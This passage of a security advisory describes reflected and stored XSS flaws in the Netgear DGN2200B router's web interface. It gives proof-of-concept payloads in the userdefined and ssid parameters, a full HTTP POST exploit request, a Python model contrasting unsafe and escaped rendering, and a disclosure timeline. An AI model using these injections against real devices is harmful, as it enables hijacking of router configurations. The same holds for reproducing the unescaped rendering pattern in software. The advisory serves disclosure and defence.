Netgear DGN2200B Multiple Vulnerabilities (2)

userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0

You could also change the request method to HTTP GET:
?userdefined="><img%20src="0"%20onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0

The script code is executed as soon as this service entry is edited again.

Screenshot:

* stored XSS:

Injecting scripts into the ssid parameter reveals that this parameter is not properly validated against malicious input. You need to be authenticated, or you have to find another way of inserting the malicious JavaScript code.

-> Wireless-Konfiguration -> Netzwerkname (SSID)

Param: ssid

POST /wlg_sec_profile_main.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Cookie: uid=vjkqK779eJ
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 328

ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0
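The stored XSS above works because the SSID is written back into the configuration page without output encoding. The following added example (not code from the advisory or from Netgear's firmware) models the handler in Python: it decodes the form body the way a CGI script would, shows the unsafe rendering that lets the value break out of the input attribute, and the hardened rendering that HTML-escapes it. The sample body is constructed after the request above; the page's own ssid value is truncated, so a closing `</script>` tag is assumed here. The SSID length limit of 32 octets comes from IEEE 802.11; the function names are hypothetical.

```python
from html import escape
from urllib.parse import parse_qs, unquote

# Constructed sample body modelled on the advisory's POST request (assumption: the
# truncated payload ends with a closing </script> tag).
SAMPLE_BODY = (
    "ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E"
    "&WRegion=5&w_channel=0&opmode=20n&enable_ap=1"
)

SSID_MAX_OCTETS = 32  # IEEE 802.11 limit on SSID length


def decode_ssid(body: str) -> str:
    """Parse the form body as a CGI handler would and return the literal SSID.

    parse_qs performs one round of percent-decoding; the value in the advisory is
    percent-encoded twice, so a second unquote() is applied to reach the text the
    firmware ends up storing.
    """
    fields = parse_qs(body, keep_blank_values=True)
    raw = fields.get("ssid", [""])[0]
    return unquote(raw)


def validate_ssid(ssid: str) -> bool:
    """Reject values that cannot be a legitimate SSID (empty, over 32 octets, or
    containing non-printable characters). Validation alone does not stop this
    bug: the payload below is a valid-length printable string."""
    if not (0 < len(ssid.encode("utf-8")) <= SSID_MAX_OCTETS):
        return False
    return all(ch.isprintable() for ch in ssid)


def render_ssid_field_unsafe(ssid: str) -> str:
    """Vulnerable pattern: the stored value is concatenated into the HTML as-is,
    so a leading double quote closes the attribute and the rest becomes markup."""
    return '<input type="text" name="ssid" value="%s">' % ssid


def render_ssid_field(ssid: str) -> str:
    """Hardened pattern: escape() with quote=True converts & < > " and ' to
    entities, so the value can neither close the attribute nor open a tag."""
    return '<input type="text" name="ssid" value="%s">' % escape(ssid, quote=True)


def handle_request(body: str) -> dict:
    """Decode, validate and render the SSID; rejected values render nothing."""
    ssid = decode_ssid(body)
    ok = validate_ssid(ssid)
    return {"ssid": ssid, "accepted": ok, "html": render_ssid_field(ssid) if ok else ""}


if __name__ == "__main__":
    result = handle_request(SAMPLE_BODY)
    print("decoded ssid :", result["ssid"])
    print("unsafe html  :", render_ssid_field_unsafe(result["ssid"]))
    print("escaped html :", result["html"])
```

Running it shows the decoded SSID `"><script>alert(1)</script>`, the unsafe rendering containing a live `<script>` element, and the escaped rendering where the same bytes appear only as `&quot;&gt;&lt;script&gt;...`. The escaping belongs at the point where the value is written into the page, not at input time, because the stored SSID is also sent over the air and to other UI pages that need the raw bytes.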

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Twitter: @s3cur1ty_de

============ Time Line: ============

17.12.2012 - discovered vulnerability
18.12.2012 - Privately reported all details to vendor
18.12.2012 - vendor responded that they will check the reported vulnerability details
29.01.2013 - vendor contacted me to test a new firmware
29.01.2013 - /me responded that I need more details about the fixes before I will test the new firmware
30.01.2013 - vendor responded that I should just check it
31.01.2013 - /me responded that I will not check the firmware if they do not provide more details (do not waste my time again!)
11.02.2013 - vendor responded that he has to declare it internally
15.02.2013 - public release

===================== Advisory end =====================

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Netgear
-------
The vendor has not yet released a patch or upgrade. We recommend that users of this product monitor the vendor's homepage for the latest version:
